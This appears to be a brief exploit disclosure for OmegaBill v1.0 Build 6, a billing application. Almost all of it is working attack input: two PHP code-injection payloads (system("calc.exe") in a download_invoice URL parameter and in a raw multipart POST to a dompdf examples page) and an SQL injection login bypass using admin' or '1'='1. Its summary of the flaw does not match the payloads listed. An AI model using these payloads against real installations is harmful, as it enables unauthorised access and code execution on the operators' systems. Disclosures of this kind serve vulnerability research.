OmegaBill v1.0 Build 6
An authentication bypass/SQL injection vulnerability in OmegaBill v1.0 Build 6 can be exploited to retreive a list of usernames and passwords. Vulnerability 1: http://localhost/OmegaBill_v1.0_Build6/clients/download_invoice.php?invoiceid=<?php system("calc.exe"); ?> Vulnerability 2: POST http://localhost/OmegaBill_v1.0_Build6/plugins/dompdf/www/examples.php HTTP/1.1 Host: localhost Connection: keep-alive User-Agent: x Content-Length: 93 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----x Accept: text/html Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 ------x Content-Disposition: form-data; name="html" <?php system("calc.exe"); ?> ------x-- SQL Injection: http://localhost/OmegaBill_v1.0_Build6/login.php?username=admin'+or+'1'='1